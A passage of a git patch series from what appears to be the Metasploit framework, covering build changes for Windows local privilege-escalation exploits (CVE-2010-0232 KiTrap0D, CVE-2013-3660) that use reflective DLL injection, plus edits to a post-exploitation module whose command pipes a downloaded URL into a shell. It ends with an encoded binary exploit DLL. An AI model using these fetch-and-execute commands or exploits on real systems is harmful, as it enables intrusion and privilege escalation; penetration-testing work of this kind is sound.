       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -121,17 +121,21 @@
       <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
     <PostBuildEvent>
-      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemGroup>
-    <ClCompile Include="..\common\LoadLibraryR.c" />
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
     <ClCompile Include="..\common\ResourceLoader.c" />
     <ClCompile Include="kitrap0d.c" />
   </ItemGroup>
   <ItemGroup>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
     <ClInclude Include="..\common\common.h" />
-    <ClInclude Include="..\common\LoadLibraryR.h" />
     <ClInclude Include="..\common\ResourceLoader.h" />
     <ClInclude Include="resource.h" />
   </ItemGroup>
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters
index 3c522c527e..9aea3a8408 100644
--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters
@@ -2,24 +2,24 @@
 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <ItemGroup>
     <ClCompile Include="kitrap0d.c" />
-    <ClCompile Include="..\common\LoadLibraryR.c">
-      <Filter>common</Filter>
-    </ClCompile>
     <ClCompile Include="..\common\ResourceLoader.c">
       <Filter>common</Filter>
     </ClCompile>
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
+      <Filter>RDI</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="resource.h" />
     <ClInclude Include="..\common\common.h">
       <Filter>common</Filter>
     </ClInclude>
-    <ClInclude Include="..\common\LoadLibraryR.h">
-      <Filter>common</Filter>
-    </ClInclude>
     <ClInclude Include="..\common\ResourceLoader.h">
       <Filter>common</Filter>
     </ClInclude>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
+      <Filter>RDI</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="kitrap0d.rc" />
@@ -28,5 +28,8 @@
     <Filter Include="common">
       <UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
     </Filter>
+    <Filter Include="RDI">
+      <UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
+    </Filter>
   </ItemGroup>
 </Project>
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj
index 32875e0cb3..41cb73ff96 100644
--- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj
@@ -49,7 +49,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -75,7 +75,7 @@
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
index 7bc93fcb93..bacbb7b87f 100755
--- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
@@ -7,7 +7,7 @@
 
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "../common/ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 #include <stdlib.h>
 #include "kitrap0d.h"
diff --git a/external/source/exploits/CVE-2010-0232/make.msbuild b/external/source/exploits/CVE-2010-0232/make.msbuild
new file mode 100755
index 0000000000..a44980b045
--- /dev/null
+++ b/external/source/exploits/CVE-2010-0232/make.msbuild
@@ -0,0 +1,18 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\kitrap0d.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2010-0232 KiTrap0D x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="KiTrap0D is not supported in x64" />
+  </Target>
+</Project>
+
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
new file mode 100755
index 0000000000..2acf81084f
--- /dev/null
+++ b/external/source/exploits/make.bat
@@ -0,0 +1,39 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X86" GOTO BUILD_X86
+IF "%1"=="x64" GOTO BUILD_X64
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building Exploits x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X86
+ECHO "Building Exploits x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building Exploits x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+ECHO "Building CVE-2010-0232 (KiTrap0D)"
+PUSHD CVE-2010-0232
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+
+FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
+SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
+echo Finished %ldt%
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END

From 288476441fedbee7b16d111422de1ebef9bb938f Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 27 Nov 2013 00:41:09 -0600
Subject: [PATCH 106/217] Fix improper use of expand_path

I don't even.
---
 modules/post/linux/manage/download_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
index 09a918e620..aeda593bcb 100644
--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
   end
 
   def exists_exe?(exe)
-    path = expand_path(ENV['PATH'])
+    path = expand_path("$PATH")
     if path.nil? or path.empty?
       return false
     end

From e8da97aa17cc52c92f88cdfda07a314e981f5427 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 27 Nov 2013 00:43:07 -0600
Subject: [PATCH 107/217] Fix extraneous use of which and cmdsub

I don't even.
---
 modules/post/linux/manage/download_exec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
index aeda593bcb..1d56a3dc62 100644
--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -109,9 +109,9 @@ class Metasploit3 < Msf::Post
     end
 
     if datastore['URL'].match(/https/)
-      cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | `which #{@shell}` ")
+      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
     else
-      cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{datastore['URL']} 2>/dev/null | `which #{@shell}` ")
+      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
     end
   end
 

From b202b98a4240ed5aca2f587c9a2db2e750a42f89 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 27 Nov 2013 00:57:45 -0600
Subject: [PATCH 108/217] Anchor the scheme

---
 modules/post/linux/manage/download_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
index 1d56a3dc62..98ff87bb25 100644
--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    if datastore['URL'].match(/https/)
+    if datastore['URL'].match(/^https/)
       cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
     else
       cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")

From f3e71c2c9dde57c554f86c643484b291238ee5bd Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 27 Nov 2013 01:03:41 -0600
Subject: [PATCH 109/217] Be more specific

Perl!
---
 modules/post/linux/manage/download_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
index 98ff87bb25..c1470ed799 100644
--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    if datastore['URL'].match(/^https/)
+    if datastore['URL'].match(%r{^https://})
       cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
     else
       cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")

From defc0ebe5c76e652c59e0660ad7437ed8ecd153f Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 27 Nov 2013 20:00:50 +1000
Subject: [PATCH 110/217] ppr_flatten_rec update, RDI submodule, and refactor

This commit contains a few changes for the ppr_flatten_rec local windows
exploit. First, the exploit binary itself:

* Updated to use the RDI submodule.
* Updated to build with VS2013.
* Updated to generate a binary called `ppr_flatten_rc.x86.dll`.
* Invocation of the exploit requires address of the payload to run.

Second, the module in MSF behaved a little strange. I expected it to create
a new session with system privs and leave the existing session alone. This
wasn't the case. It used to create an instance of notepad, migrate the
_existing_ session to it, and run the exploit from there. This behaviour
didn't seem to be consistent with other local exploits. The changes
include:

* Existing session is now left alone, only used as a proxy.
* New notepad instance has exploit reflectively loaded.
* New notepad instance has payload directly injected.
* Exploit invocation takes the payload address as a parameter.
* A wait is added as the exploit is slow to run (nature of the exploit).
* Payloads are executed on successful exploit.
---
 data/exploits/cve-2013-3660/exploit.dll       | Bin 51200 -> 0 bytes
 .../cve-2013-3660/ppr_flatten_rec.x86.dll     | Bin 0 -> 72192 bytes
 .../source/exploits/cve-2013-3660/LICENSE.txt |  25 -
 .../source/exploits/cve-2013-3660/Readme.md   |  71 ---
 .../cve-2013-3660/dll/reflective_dll.sln      |  20 -
 .../cve-2013-3660/dll/reflective_dll.vcproj   | 357 -------------
 .../cve-2013-3660/dll/reflective_dll.vcxproj  | 266 ----------
 .../dll/reflective_dll.vcxproj.filters        |  32 --
 .../dll/src/ReflectiveDLLInjection.h          |  51 --
 .../cve-2013-3660/dll/src/ReflectiveLoader.c  | 496 ------------------
 .../cve-2013-3660/dll/src/ReflectiveLoader.h  | 202 -------
 .../exploits/cve-2013-3660/make.msbuild       |  18 +
 .../cve-2013-3660/ppr_flatten_rec.sln         |  22 +
 .../src => ppr_flatten_rec}/ComplexPath.h     |  51 +-
 .../ppr_flatten_rec.c}                        |  98 ++--
 .../ppr_flatten_rec/ppr_flatten_rec.vcxproj   | 141 +++++
 .../ppr_flatten_rec.vcxproj.filters           |   9 +
 .../source/exploits/cve-2013-3660/rdi.sln     |  20 -
 external/source/exploits/make.bat             |   7 +
 .../exploits/windows/local/ppr_flatten_rec.rb | 110 ++--
 20 files changed, 342 insertions(+), 1654 deletions(-)
 delete mode 100755 data/exploits/cve-2013-3660/exploit.dll
 create mode 100755 data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll
 delete mode 100755 external/source/exploits/cve-2013-3660/LICENSE.txt
 delete mode 100755 external/source/exploits/cve-2013-3660/Readme.md
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
 delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
 create mode 100755 external/source/exploits/cve-2013-3660/make.msbuild
 create mode 100755 external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
 rename external/source/exploits/cve-2013-3660/{dll/src => ppr_flatten_rec}/ComplexPath.h (96%)
 rename external/source/exploits/cve-2013-3660/{dll/src/ReflectiveDll.c => ppr_flatten_rec/ppr_flatten_rec.c} (90%)
 create mode 100755 external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
 create mode 100755 external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
 delete mode 100755 external/source/exploits/cve-2013-3660/rdi.sln

diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
deleted file mode 100755
index cbb761b5684f8cb8368acd08e349616f8e5fab04..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 51200
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
